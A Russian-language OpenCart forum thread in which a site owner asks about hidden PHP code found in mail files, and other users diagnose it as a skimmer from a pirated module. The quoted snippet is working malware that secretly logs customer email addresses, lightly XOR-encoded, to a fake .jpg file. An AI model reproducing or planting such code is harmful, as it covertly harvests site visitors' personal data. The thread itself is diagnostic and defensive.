Jump to content
Sign in to follow this  
Leva888

Вирус или как?

Recommended Posts

Приветствую,

 

Нашел у себя на сайте в system/library/mail.php и в admin/controller/sale/contact.php

вот такой спрятанный код, хотелось бы понять что это такое и откуда оно взялось.

<?php /* 62735f32d0da45a576376b71fcbafb50 */ function xmail () { $a=func_get_args(); file_put_contents('/home/domen/public_html/admin/controller/report/z3o.jpg', x($_SERVER['REQUEST_URI']. ' ' .$a[0]."\n"), FILE_APPEND); return mail($a[0],$a[1],$a[2], $a[3]);} function x($s) { $t=$s; $o = ''; for($i=0;$i<strlen($t);$i++){ $o .= $t{$i} ^ '0';} return $o;}?>

Share this post


Link to post
Share on other sites

откройте файлик этот ( /home/domen/public_html/admin/controller/report/z3o.jpg ) через блокнот и покажите что в нём.

Share this post


Link to post
Share on other sites

Не получается кодом вставить. Пристегнул файл.

 

PS причем после удаления этого кода из указанных файлов скрипт отправки сообщений перестал работать:)

post-18427-0-63272400-1412111158_thumb.jpg

Share this post


Link to post
Share on other sites

это вирус малевича))))

черный квадрат называется)

  • +1 1

Share this post


Link to post
Share on other sites

собирает емайлы покупателей

или запускает как раз таки вирусный файл

взялось откудато

либо старая версия опенкарта

либо фтп взломали

либо либо установили какото модуль который заменил системные файлы

 

лечение: перезалить на оригинальные файлы движка

Share this post


Link to post
Share on other sites

Вы блокнотом откройте тот рисунок или поменяйте расшмрение с jpeg на txt и напишите сюда то, что содеожится внутри файла. 

Share this post


Link to post
Share on other sites

Что-то не подумал в тхт поменять:)

Объем видимо большой, не дает кодом вставить. Прикрепил тхт

z3o.txt

Share this post


Link to post
Share on other sites

По поводу откуда взялось.

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

Edited by AlexFisher
censored

Share this post


Link to post
Share on other sites

По поводу откуда взялось.

Перед этим ставил вот этот модуль 

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

ничего удивительного это варезник

продает чужие модули

Share this post


Link to post
Share on other sites

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

А вы почаще на варезах модули берите.... тогда у вас такая дыра в безопасности вашего сайта будет, к которую легко влетит средних размеров слон...

...а пока радуйтесь что так легко отделались... хотя это - еще не факт...

Share this post


Link to post
Share on other sites

уже восстановил из бэкапа.

Спасибо.

Share this post


Link to post
Share on other sites

Если я выложу сюда этот модуль, сможет его кто-нибудь почистить?

Share this post


Link to post
Share on other sites

Правила форума читайте. Например пункт 2.5

Нельзя его здесь выкладывать.

Share this post


Link to post
Share on other sites

Если я выложу сюда этот модуль, сможет его кто-нибудь почистить?

Скорее вас почистят...) половина форума - разработчики, чьи модули, некоторые псевдо-Робин-Гуды сливают на варез....а такие крохоборы-холявщики как вы (простите - ничего личного), их там берут. А потом приходят на форум, где варез очень не любят и жалуются-просят об услугах.  И опять же - не в платном разделе...) т.е. - за спасибо.

Share this post


Link to post
Share on other sites

боюсь, что это не всё..

1. сколько ещё таких xmail в ваших файлах?

2. кто вызывает xmail ?

Share this post


Link to post
Share on other sites

ТС, качай еще модули с вареза.

БОЛЬШЕ ЖЕСТИ!

Share this post


Link to post
Share on other sites

Вот разберешь их где варез, а где нет. Этот модуль хоть и небольших, но денег стоил, а на сайте у продавца не сказано что он варезник поганый.

 

В mail.php был вызов xmail, заменил его здоровым файлом

Edited by Leva888

Share this post


Link to post
Share on other sites

я бы на вашем месте не смог спать спокойно.

1. помимо xmail может быть полно других функций

2. злоумышленник уже мог распихать свои бэкдоры по всему сайту

3. злоумышленник уже мог получить доступ к ftp, панели управления, биллингу

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.